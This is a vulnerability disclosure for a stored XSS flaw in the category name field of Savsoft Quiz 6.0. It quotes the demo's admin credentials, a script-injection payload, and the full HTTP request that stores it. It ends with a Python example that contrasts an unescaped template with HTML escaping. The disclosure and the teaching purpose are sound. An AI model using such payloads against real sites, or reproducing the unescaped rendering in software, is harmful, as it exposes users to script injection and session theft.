Submit #319897: Techkshetra Info Solutions Savsoft Quiz 6.0 Stored XSS

Title: Techkshetra Info Solutions Savsoft Quiz 6.0 Stored XSS

Description: Based on the online demo: https://savsoftquiz.com/web/index.php/online-demo/ (Username: admin, Password: admin) and the open source project: https://github.com/Techkshetra/savsoftquizv6.0

Once authenticated, go to Settings > Category > in the Category list, click edit on any category name, and add the following payload:

    "><script>alert('XSS')</script>

It will trigger persistent XSS everywhere the category is displayed in the software. The "category_name=" parameter is not sanitized and is vulnerable to XSS.

Here is the POST request I have:

    POST /demo/savsoftquizv6.0/public/index.php/Qbank/editCategory HTTP/1.1
    Host: demo.savsoftquiz.com
    Content-Length: 111
    Sec-Ch-Ua: "Not_A Brand";v="8", "Chromium";v="120"
    Accept: */*
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    Sec-Ch-Ua-Mobile: ?0
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.71 Safari/537.36
    Sec-Ch-Ua-Platform: "Linux"
    Origin: https://demo.savsoftquiz.com
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: cors
    Sec-Fetch-Dest: empty
    Referer: https://demo.savsoftquiz.com/demo/sqv6/dist/dashboard.html
    Accept-Encoding: gzip, deflate, br
    Accept-Language: en-US,en;q=0.9
    Priority: u=1, i
    Connection: close

    user_token=132-1-1713531035&id=1&category_name=Default%22%3E%3Cscript%3Ealert('XSS')%3C%2Fscript%3E&parent_id=0

Source: https://demo.savsoftquiz.com/demo/sqv6/dist/dashboard.html
User: rubx (ID 62535)
Submission: 2024-04-19 15:12 (1 month ago)
Moderation: 2024-04-26 14:58 (7 days later)
Status: Accepted
VulDB Entry: 262148
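As an added illustration of the flaw and its fix (example code written for this page, not code from the report or from the Savsoft Quiz project), the script below decodes the quoted POST body the way the server would, renders the stored category name through a hypothetical template that interpolates it unescaped, and through the same template with context-appropriate HTML escaping, then counts the script elements a tokenizer produces from each result. The template markup and the function names are assumptions, not the application's real views.

```python
import html
from html.parser import HTMLParser
from urllib.parse import parse_qs

# Constructed from the POST body quoted in the report (not captured from the app).
POST_BODY = ("user_token=132-1-1713531035&id=1"
             "&category_name=Default%22%3E%3Cscript%3Ealert('XSS')%3C%2Fscript%3E"
             "&parent_id=0")


def category_name_from_body(body: str) -> str:
    """Decode the form body as the server sees it (percent-decoding included)."""
    return parse_qs(body, keep_blank_values=True)["category_name"][0]


def render_vulnerable(name: str) -> str:
    """Hypothetical template: the stored value lands unescaped in an attribute
    (edit form) and in element text (category list), the flaw the report describes."""
    return f'<input name="category_name" value="{name}"><li>{name}</li>'


def render_hardened(name: str) -> str:
    """Same template with HTML escaping; quote=True also covers the attribute context."""
    safe = html.escape(name, quote=True)
    return f'<input name="category_name" value="{safe}"><li>{safe}</li>'


class _Collector(HTMLParser):
    """Minimal tokenizer: records start tags and decoded text nodes."""
    def __init__(self):
        super().__init__()
        self.tags, self.text = [], []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)

    def handle_data(self, data):
        self.text.append(data)


def _parse(markup: str) -> _Collector:
    p = _Collector()
    p.feed(markup)
    p.close()
    return p


def script_elements(markup: str) -> int:
    """Number of <script> elements created from the markup (0 is the safe result)."""
    return _parse(markup).tags.count("script")


def recovered_text(markup: str) -> str:
    """Text a browser would display; for the hardened output it equals the stored name."""
    return "".join(_parse(markup).text)
```

Running `script_elements` over both renderings shows the unescaped template yielding two script elements and the escaped one yielding none while still displaying the name verbatim.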
